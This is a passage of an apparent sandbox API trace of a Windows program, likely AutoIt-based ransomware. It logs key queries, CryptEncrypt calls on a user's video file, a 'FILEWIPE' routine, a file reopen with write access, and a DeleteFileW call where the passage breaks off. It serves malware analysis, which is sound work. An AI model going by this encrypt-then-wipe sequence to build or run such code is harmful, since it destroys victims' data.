hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0043.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae928 [0043.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.929] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.930] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.931] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.931] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.931] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.931] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.931] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.931] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.932] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.932] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.932] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.933] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17ea7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17eb0) returned 1 [0043.933] CharLowerBuffW (in: lpsz="byte[97969]", cchLength=0xb | out: lpsz="byte[97969]") returned 0xb [0043.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.938] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x964d68*, pdwDataLen=0x6ae220*=0x17ea7, dwBufLen=0x17eb0 | out: pbData=0x964d68*, pdwDataLen=0x6ae220*=0x17eb0) returned 1 [0043.941] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.955] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.955] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0043.956] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.956] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.957] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.957] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.957] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.958] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0xfdec7b10, ftLastWriteTime.dwHighDateTime=0x1d5c191, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0x7c2100 [0043.958] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.958] CharLowerBuffW (in: lpsz="byte[97959]", cchLength=0xb | out: lpsz="byte[97959]") returned 0xb [0043.959] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.959] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.959] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.959] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.960] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.962] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.962] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\s u.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.963] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.963] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.963] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.963] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.963] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.964] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.964] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFilePart=0x0) returned 0x3b [0043.964] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0x19e8e740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0x7c2100 [0043.964] DeleteFileW 